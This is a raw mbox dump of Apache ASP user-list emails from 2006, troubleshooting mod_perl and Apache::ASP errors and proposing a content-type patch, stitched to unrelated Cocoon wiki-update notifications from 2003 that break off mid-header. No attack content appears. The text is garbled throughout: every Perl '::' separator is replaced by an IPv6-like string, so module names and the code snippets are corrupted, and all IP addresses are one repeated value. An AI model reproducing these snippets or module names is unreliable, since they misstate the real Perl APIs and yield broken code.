[Tue Jun 06 00:05:32 2006] [error] [client 161.129.204.104] Can't >> locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" at >> /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line 2016.\n at > > [ ... ] > > Usually these errors are a result of not use()ing the > module in question; from > perl -MModPerlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bMethodLookup -e print_method get > the relevant module is APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable. However, this > module should have been loaded (in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP 2.59) > by Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpacheCommon. Did all of the mod_perl > and Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP tests succeed when you installed them? > If so, does adding > use APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable (); > at the beginning of Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP help? > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jun 13 18:13:21 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57350 invoked from network); 13 Jun 2006 18:13:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Jun 2006 18:13:21 -0000 Received: (qmail 94218 invoked by uid 500); 13 Jun 2006 18:13:21 -0000 Delivered-To: [email protected] Received: (qmail 94036 invoked by uid 500); 13 Jun 2006 18:13:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 94025 invoked by uid 99); 13 Jun 2006 18:13:20 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jun 2006 11:13:20 -0700 X-ASF-Spam-Status: No, hits=1.9 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,MSGID_FROM_MTA_HEADER,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO hotmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jun 2006 11:13:19 -0700 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 13 Jun 2006 11:12:59 -0700 Message-ID: <[email protected]> Received: from 161.129.204.104 by by21fd.bay21.hotmail.msn.com with HTTP; Tue, 13 Jun 2006 18:12:56 GMT X-Originating-IP: [161.129.204.104] X-Originating-Email: [[email protected]] X-Sender: [email protected] From: "This Happends" <[email protected]> To: [email protected] Subject: Problems to install Asp Date: Tue, 13 Jun 2006 21:12:56 +0300 Mime-Version: 1.0 Content-Type: text/plain; format=flowed X-OriginalArrivalTime: 13 Jun 2006 18:12:59.0397 (UTC) FILETIME=[009C5B50:01C68F15] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi I'm wondering how i can't get work asp for Apache. Perl works very well. I have installed this packed Perl-5.8-win32-bin.exe distribution. When i'm trying to see my one Active server Pages i'll get this warning: Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. No any Faq can't help me. So do you have any good advices for me? Iis works fine, but i don't like this system because its not like real Apache www server. Thanks Yacc _________________________________________________________________ FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jun 15 02:26:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32571 invoked from network); 15 Jun 2006 02:26:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Jun 2006 02:26:31 -0000 Received: (qmail 42215 invoked by uid 500); 15 Jun 2006 02:26:31 -0000 Delivered-To: [email protected] Received: (qmail 42204 invoked by uid 500); 15 Jun 2006 02:26:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 46396 invoked by uid 99); 12 Jun 2006 13:45:41 -0000 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: 161.129.204.104 is neither permitted nor denied by domain of [email protected]) Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=lima; d=yahoogroups.com; b=gHXKHMr2ki7aAtBR6t2Nyz/LEtu9kX3/0kGAHLtZYkjSweS7oA5xJDoHy7F6LwAXdAkTdSy8XwAHRMEOgEazBEZdS+F6vzTBuYDFq3ADs6opmvOxLAQOyyl6ZPQ7jBdw; Date: Mon, 12 Jun 2006 13:45:16 -0000 From: "dpasqua2" <[email protected]> To: [email protected] Subject: Re: ASP error: Can't locate object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable"... Message-ID: <[email protected]> In-Reply-To: <[email protected]> User-Agent: eGroups-EW/0.82 MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable X-Mailer: Yahoo Groups Message Poster X-Yahoo-Post-IP: 161.129.204.104 X-Yahoo-Newman-Property: groups-compose Sender: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi Maurice, I had the same problem. It seems that Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bcompat is required by Apache ASP to run with mod_perl 2. The the solution was to load Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bcompat in startup.pl. The file startup.pl must be included in Apache's configuration file. startup.pl: #!/usr/bin/perl use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bcompat; 1; httpd.conf: PerlRequire /usr/local/apache/conf/startup.pl Regards, Douglas Pasqua Brazil --- In [email protected], Maurice Yarrow <yarrow@...> wrote: > > Hello ASP people > > Environment: > FC1 > apache httpd 2.0.58 > perl5.8.8 > BLDBM, BLDBMacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bSync, Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP (2.59) - I just installed these. > mod_perl.so (2.0.2) installed, httpd.conf configured with appropriate > LoadModule directive > > After making and installing the above perl modules, copied the > Apache-ASP-2.59/site/asp directory tree to htdocs (including, > of course, htdocs/asp/eg/.htaccess), added the appropriate > <Directory "/usr/local/apache2/htdocs/asp/eg" > > Options FollowSymLinks > AllowOverride All > </Directory> > directive. > Can go to http://localhost/asp (index.html), but get the below error > message when going to http://localhost/asp/eg (i.e., the examples > dir from above): > > [Tue Jun 06 00:05:32 2006] [error] [client 161.129.204.104] Can't locate > object method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" at > /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line 2016.\n at > /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line > 2016\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dir_config('APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable=3DHASH(0x85005c4)', > 'Global') called at /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm > line 275\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnew('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP', > 'Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=3DSCALAR(0x85005a0)', > '/usr/local/apache2/htdocs/asp/eg/index.html') called at > /usr/local/lib/perl5/site_perl/5.8.8/Apache/ASP.pm line > 183\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhandler('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=3DSCALAR(0x85005a0)') > called at -e line 0\n\teval {...} called at -e line 0\n > [root@orion Apache-ASP-2.59]# > > I observe that this is an error that has been reported previously in > the ASP user group archives (currently maintained at yahoo), but > I saw no indication of a resolution. (I am not a yahoo special > interest group member, so did not pursue it further at that location.) > > Any ideas ? > > Regards, > Maurice Yarrow > > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: asp-unsubscribe@... > For additional commands, e-mail: asp-help@... > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jun 15 14:51:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95999 invoked from network); 15 Jun 2006 14:51:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Jun 2006 14:51:52 -0000 Received: (qmail 28570 invoked by uid 500); 15 Jun 2006 14:51:51 -0000 Delivered-To: [email protected] Received: (qmail 28539 invoked by uid 500); 15 Jun 2006 14:51:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 28521 invoked by uid 99); 15 Jun 2006 14:51:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jun 2006 07:51:50 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO theoryx5.uwinnipeg.ca) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jun 2006 07:51:49 -0700 Received: from theoryx5.uwinnipeg.ca (localhost.localdomain [161.129.204.104]) by theoryx5.uwinnipeg.ca (8.12.8/8.12.8) with ESMTP id k5FEiTvo031856; Thu, 15 Jun 2006 09:44:34 -0500 Received: from localhost (randy@localhost) by theoryx5.uwinnipeg.ca (8.12.8/8.12.8/Submit) with ESMTP id k5FEiSEV031852; Thu, 15 Jun 2006 09:44:28 -0500 Date: Thu, 15 Jun 2006 09:44:28 -0500 (CDT) From: Randy Kobes <[email protected]> To: This Happends <[email protected]> cc: [email protected] Subject: Re: Problems to install Asp In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Tue, 13 Jun 2006, This Happends wrote: > Hi > > I'm wondering how i can't get work asp for Apache. Perl works very well. I > have installed this packed Perl-5.8-win32-bin.exe distribution. > > When i'm trying to see my one Active server Pages i'll get this warning: > > Internal Server Error > The server encountered an internal error or misconfiguration and was unable > to complete your request. > > No any Faq can't help me. So do you have any good advices for me? Iis works > fine, but i don't like this system because its not like real Apache www > server. Is there a message in the error log that might give a clue about what's happening? Also, can you give a short example script, and the relevant Apache directives used, that illustrate the problem? Some details about your system (Perl and Apache versions, and mod_perl version) would also help. -- best regards, Randy Kobes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jun 15 15:20:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8877 invoked from network); 15 Jun 2006 15:20:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Jun 2006 15:20:54 -0000 Received: (qmail 13831 invoked by uid 500); 15 Jun 2006 15:20:54 -0000 Delivered-To: [email protected] Received: (qmail 13812 invoked by uid 500); 15 Jun 2006 15:20:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 13801 invoked by uid 99); 15 Jun 2006 15:20:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jun 2006 08:20:53 -0700 X-ASF-Spam-Status: No, hits=1.9 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,MSGID_FROM_MTA_HEADER,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO hotmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jun 2006 08:20:53 -0700 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 15 Jun 2006 08:20:32 -0700 Message-ID: <[email protected]> Received: from 161.129.204.104 by by113fd.bay113.hotmail.msn.com with HTTP; Thu, 15 Jun 2006 15:20:29 GMT X-Originating-IP: [161.129.204.104] X-Originating-Email: [[email protected]] X-Sender: [email protected] In-Reply-To: <[email protected]> From: "Kunal Parekh" <[email protected]> To: [email protected], [email protected] Cc: [email protected] Subject: Re: Problems to install Asp Date: Thu, 15 Jun 2006 08:20:29 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed X-OriginalArrivalTime: 15 Jun 2006 15:20:32.0296 (UTC) FILETIME=[3E158A80:01C6908F] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N My experience from 2003. I worked with Apache:ASP back in 2003. I setup the Apache Server, MySQL and ASP had the website kindof ready but when it came down to hosting I realized lot of Web Hosting company did not support Apache:ASP module even though they offered Linux webhosting services. Also Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP was not well developed back then. My advice plain and simple, forget Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP if you are investing your time to do something useful and productive. Do Apache and PHP, which is supported widely. Even simpler and better just do Microsoft ASP, lot of support & help available. Webhosting companies available are plenty and the plans are cheap. I finally have a business website up with Microsoft ASP with $4 a month webhosting plan with PayPal and am happy and worry-free since last 1 yr. If you want to make it an education project than put time in doing this. Also do not forget the daily server maintainence you will have to do yourself. Is all that pain worth less than $4 a month for you? Bye. >From: Randy Kobes <[email protected]> >To: This Happends <[email protected]> >CC: [email protected] >Subject: Re: Problems to install Asp >Date: Thu, 15 Jun 2006 09:44:28 -0500 (CDT) > >On Tue, 13 Jun 2006, This Happends wrote: > >>Hi >> >>I'm wondering how i can't get work asp for Apache. Perl works very well. I >>have installed this packed Perl-5.8-win32-bin.exe distribution. >> >>When i'm trying to see my one Active server Pages i'll get this warning: >> >>Internal Server Error >>The server encountered an internal error or misconfiguration and was >>unable to complete your request. >> >>No any Faq can't help me. So do you have any good advices for me? Iis >>works fine, but i don't like this system because its not like real Apache >>www server. > >Is there a message in the error log that might give a clue >about what's happening? > >Also, can you give a short example script, and the >relevant Apache directives used, that illustrate >the problem? Some details about your system (Perl >and Apache versions, and mod_perl version) would >also help. > >-- >best regards, >Randy Kobes > >--------------------------------------------------------------------- >To unsubscribe, e-mail: [email protected] >For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jun 23 05:26:27 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53191 invoked from network); 23 Jun 2006 05:26:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 05:26:27 -0000 Received: (qmail 24859 invoked by uid 500); 23 Jun 2006 05:26:26 -0000 Delivered-To: [email protected] Received: (qmail 24802 invoked by uid 500); 23 Jun 2006 05:26:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 24791 invoked by uid 99); 23 Jun 2006 05:26:25 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 22:26:25 -0700 X-ASF-Spam-Status: No, hits=1.9 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,MSGID_FROM_MTA_HEADER,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO hotmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 22:26:23 -0700 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 22 Jun 2006 22:26:03 -0700 Message-ID: <[email protected]> Received: from 161.129.204.104 by by113fd.bay113.hotmail.msn.com with HTTP; Fri, 23 Jun 2006 05:26:01 GMT X-Originating-IP: [161.129.204.104] X-Originating-Email: [[email protected]] X-Sender: [email protected] From: "Richard Walsh" <[email protected]> To: [email protected] Subject: Content-type: application/x-www-form-urlencoded; charset=utf-8 Date: Fri, 23 Jun 2006 00:26:01 -0500 Mime-Version: 1.0 Content-Type: text/plain; format=flowed X-OriginalArrivalTime: 23 Jun 2006 05:26:03.0084 (UTC) FILETIME=[84E1B8C0:01C69685] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, I'm using Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP V2.59 with a wireless phone that sends 'application/x-www-form-urlencoded; charset=utf-8' for the content-type header during a form post. This appears to be compliant with current HTTP standards but Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP doesn't accept it. In sub new {}, line 115 of Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest.pm, I changed the following: if($headers_in->get('Content-Type') eq 'application/x-www-form-urlencoded') { to if($headers_in->get('Content-Type') =~ m|^application/x-www-form-urlencoded|) { which is consistent with the test for 'multipart/form-data' earlier in the same function, and that fixes the issue. Would it be possible to get that change put into Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP? Thx! .rw --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Mon Dec 01 09:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58065 invoked from network); 1 Dec 2003 09:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Dec 2003 09:00:16 -0000 Received: (qmail 93397 invoked by uid 500); 1 Dec 2003 08:59:51 -0000 Delivered-To: [email protected] Received: (qmail 93371 invoked by uid 500); 1 Dec 2003 08:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93360 invoked from network); 1 Dec 2003 08:59:50 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 1 Dec 2003 08:59:50 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB1902p12632 for <[email protected]>; Mon, 1 Dec 2003 10:00:03 +0100 Date: Mon, 1 Dec 2003 10:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowWeUseBugzilla Mon Dec 1 10:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowWeUseBugzilla , version: 6 on Mon Dec 1 08:59:21 2003 by 161.129.204.104 + It is easy to forget entries with that state. Better __do not use__ it - Andreas Kuckartz. + + It is easy to forget entries with that state. Better __do not use__ it - Andreas Kuckartz. + From [email protected] Mon Dec 01 16:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87900 invoked from network); 1 Dec 2003 16:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Dec 2003 16:00:09 -0000 Received: (qmail 98800 invoked by uid 500); 1 Dec 2003 16:00:04 -0000 Delivered-To: [email protected] Received: (qmail 98773 invoked by uid 500); 1 Dec 2003 16:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98762 invoked from network); 1 Dec 2003 16:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 1 Dec 2003 16:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB1G04p12840 for <[email protected]>; Mon, 1 Dec 2003 17:00:05 +0100 Date: Mon, 1 Dec 2003 17:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] FirstFridayDecember2003 Mon Dec 1 17:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 9 on Mon Dec 1 15:37:28 2003 by JoergHeinicke - * RequestGenerator/request param handling problems (see [here|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=106796038708692&w=2] (including reasonable sounding analysis), [here|http://marc.theaimsgroup.com/?t=107002913600001&r=1&w=2] and [here|http://marc.theaimsgroup.com/?l=xml-cocoon-users&m=106759767215764&w=2] (though it seems to be another problem)) + * RequestGenerator/request param handling problems (see [here|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=106796038708692&w=2] (including reasonable sounding analysis), [here|http://marc.theaimsgroup.com/?t=107002913600001&r=1&w=2] (or as [Bug 25102|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25102]) and [here|http://marc.theaimsgroup.com/?l=xml-cocoon-users&m=106759767215764&w=2] (though it seems to be another problem)) ? ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ From [email protected] Mon Dec 01 18:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54200 invoked from network); 1 Dec 2003 18:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Dec 2003 18:00:10 -0000 Received: (qmail 36378 invoked by uid 500); 1 Dec 2003 18:00:01 -0000 Delivered-To: [email protected] Received: (qmail 36360 invoked by uid 500); 1 Dec 2003 18:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36345 invoked from network); 1 Dec 2003 18:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 1 Dec 2003 18:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB1I03p12894 for <[email protected]>; Mon, 1 Dec 2003 19:00:03 +0100 Date: Mon, 1 Dec 2003 19:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowWeUseBugzilla Mon Dec 1 19:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowWeUseBugzilla , version: 9 on Mon Dec 1 17:59:52 2003 by ReinhardPoetz - *[CocoonForms Roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25110] - all issues necessary for the first stable release of CocoonForms + *[CocoonForms 1.0 - Roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25110] - all issues necessary for the first stable release of CocoonForms ? ++++++ - *[CocoonForms Roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25113] - all issues NOT necessary for the next (=first) release of CocoonForms ? ^^ ^^^^ + *[CocoonForms - future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25113] - all issues NOT necessary for the next (=first) release of CocoonForms ? ^^^^^^^^^^^^^ ^^^ From [email protected] Mon Dec 01 19:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83270 invoked from network); 1 Dec 2003 19:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Dec 2003 19:00:12 -0000 Received: (qmail 38362 invoked by uid 500); 1 Dec 2003 19:00:03 -0000 Delivered-To: [email protected] Received: (qmail 38238 invoked by uid 500); 1 Dec 2003 19:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38227 invoked from network); 1 Dec 2003 19:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 1 Dec 2003 19:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB1J05p12922 for <[email protected]>; Mon, 1 Dec 2003 20:00:06 +0100 Date: Mon, 1 Dec 2003 20:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Doco Lenya Mon Dec 1 20:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Doco , version: 5 on Mon Dec 1 18:32:14 2003 by 161.129.204.104 + The proposal is about the creation of a content management system for apache projects, codenamed "Doco", whereas the priorities should be - The proposal is about the creation of a content management system for 34434 - apache projects, codenamed "Doco", whereas the priorities should be Page: http://wiki.cocoondev.org/Wiki.jsp?page=Lenya , version: 45 on Mon Dec 1 18:30:49 2003 by 161.129.204.104 - Lenya is a Content Management System ([CMS]). See [Lenya Homepage|http://cocoon.apache.org/lenya/] for info.- ? - + Lenya is a Content Management System ([CMS]). See [Lenya Homepage|http://cocoon.apache.org/lenya/] for info. From [email protected] Mon Dec 01 20:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13676 invoked from network); 1 Dec 2003 20:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Dec 2003 20:00:12 -0000 Received: (qmail 62620 invoked by uid 500); 1 Dec 2003 20:00:01 -0000 Delivered-To: [email protected] Received: (qmail 62585 invoked by uid 500); 1 Dec 2003 20:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62417 invoked from network); 1 Dec 2003 19:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 1 Dec 2003 19:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB1K03p12949 for <[email protected]>; Mon, 1 Dec 2003 21:00:03 +0100 Date: Mon, 1 Dec 2003 21:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CMS Mon Dec 1 21:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CMS , version: 11 on Mon Dec 1 19:17:26 2003 by 161.129.204.104 - \\ From [email protected] Mon Dec 01 21:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45496 invoked from network); 1 Dec 2003 21:00:14 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Dec 2003 21:00:14 -0000 Received: (qmail 66661 invoked by uid 500); 1 Dec 2003 20:59:59 -0000 Delivered-To: [email protected] Received: (qmail 66626 invoked by uid 500); 1 